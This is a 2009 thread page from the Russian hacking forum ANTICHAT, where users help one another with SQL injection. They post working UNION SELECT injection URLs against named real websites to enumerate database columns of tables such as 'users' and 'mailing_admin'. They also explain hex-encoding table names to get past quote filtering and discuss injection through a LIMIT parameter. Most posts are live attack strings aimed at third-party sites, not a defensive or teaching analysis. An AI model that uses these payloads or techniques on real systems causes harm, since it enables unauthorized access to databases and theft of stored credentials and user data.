HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 602 из 2422 « Первая < 102502552592 598 599 600 601 602 603 604 605 606 61265270211021602 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 18.03.2009, 18:28
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
По умолчанию
2 Byrger
А ты кавычки ' замени на "

http://www.moviead.com/display.cfm?id=-1+union+select+1,2,3,COLUMN_NAME,5,6,7,8,9,10,11,1 2+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME =%22users%22+LIMIT+1,1--

типа так!
 
Ответить с цитированием

  #2  
Старый 18.03.2009, 18:28
sj666
Новичок
Регистрация: 15.12.2008
Сообщений: 11
Провел на форуме:
36737

Репутация: 6
По умолчанию
Мм, я недавно начал заниматься sql inj поэтому туплю маленько.
Вот например пытаюсь подобрать кол-во столбцов в db_galery
http://www.danieldefo.ru/gallery.html?top=1;-- UNION SELECT 1 --
Ошибки нет, возвращается так же страница =\
 
Ответить с цитированием

  #3  
Старый 18.03.2009, 19:04
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


По умолчанию
Цитата:
Сообщение от sj666  
Мм, я недавно начал заниматься sql inj поэтому туплю маленько.
Вот например пытаюсь подобрать кол-во столбцов в db_galery
http://www.danieldefo.ru/gallery.html?top=1;-- UNION SELECT 1 --
Ошибки нет, возвращается так же страница =\
Ты закрываешь коментом свой запрос вот он и проходит, вобше уязвимый параметр у нас в limit:
Цитата:
The LIMIT clause can be used to constrain the number of rows returned by the SELECT statement. LIMIT takes one or two numeric arguments, which must both be non-negative integer constants (except when using prepared statements).
2Byrger это не слепая, переводить можно и так(php)
echo "0x".bin2hex("здесь пишем чего хотим перевисти");
Последний раз редактировалось AkyHa_MaTaTa; 18.03.2009 в 19:06..
 
Ответить с цитированием

  #4  
Старый 18.03.2009, 19:22
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию
Цитата:
Сообщение от sj666  
http://www.danieldefo.ru/gallery.html?top=1
Цитата:
После непродолжительных работ, сайт откроектся =)
Оставайтесь с нами!
Для тех, кто не знает кто такой даниельдефо - погуглите =)

А инъекция после лимита возможна. Более чем )
 
Ответить с цитированием

  #5  
Старый 18.03.2009, 18:56
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766

Репутация: 61
По умолчанию
Цитата:
http://supertractor.ru/index.php?rshow=price&act=viewcat&cid=-1+union+select+1,COLUMN_NAME,3,4+FROM+information_ schema.columns+WHERE+table_name=%22mailing_admin%2 2--
А тут почему не читает? (слепая скуля)
 
Ответить с цитированием

  #6  
Старый 18.03.2009, 18:58
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


По умолчанию
http://supertractor.ru/index.php?rshow=price&act=viewcat&cid=-1+union+select+1,COLUMN_NAME,3,4+FROM+information_ schema.columns+WHERE+table_name=0x6d61696c696e675f 61646d696e--
 
Ответить с цитированием

  #7  
Старый 18.03.2009, 18:59
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766

Репутация: 61
По умолчанию
Цитата:
Сообщение от Pashkela  
http://supertractor.ru/index.php?rshow=price&act=viewcat&cid=-1+union+select+1,COLUMN_NAME,3,4+FROM+information_ schema.columns+WHERE+table_name=0x6d61696c696e675f 61646d696e--
А где переводить в такую бяку?
 
Ответить с цитированием

  #8  
Старый 18.03.2009, 19:11
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


По умолчанию
Цитата:
Сообщение от Byrger  
А где переводить в такую бяку?
https://forum.antichat.ru/showpost.php?p=1151651&postcount=657
 
Ответить с цитированием

  #9  
Старый 18.03.2009, 19:54
jangle
Познающий
Регистрация: 19.11.2006
Сообщений: 32
Провел на форуме:
95879

Репутация: 5
По умолчанию
Цитата:
А инъекция после лимита возможна. Более чем )
INSERT? или есть еще что интересного?
 
Ответить с цитированием

  #10  
Старый 18.03.2009, 19:57
jangle
Познающий
Регистрация: 19.11.2006
Сообщений: 32
Провел на форуме:
95879

Репутация: 5
По умолчанию
Цитата:
Давай посмотрим реализацию Например тут:

http://www.ngo-monitor.org/articles.php?article_type=op-eds&type=whatsnew&limit=140'

http://www.ngo-monitor.org/articles.php?article_type=op-eds&type=whatsnew&limit=140,2--+

Ну или твой вариант с удовольствием посмотрю. С "ORDER BY", что-бы всё как положено
Да я то же хочу посмотреть!!!!!
 
Ответить с цитированием
Ответ
Страница 602 из 2422 « Первая < 102502552592 598 599 600 601 602 603 604 605 606 61265270211021602 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.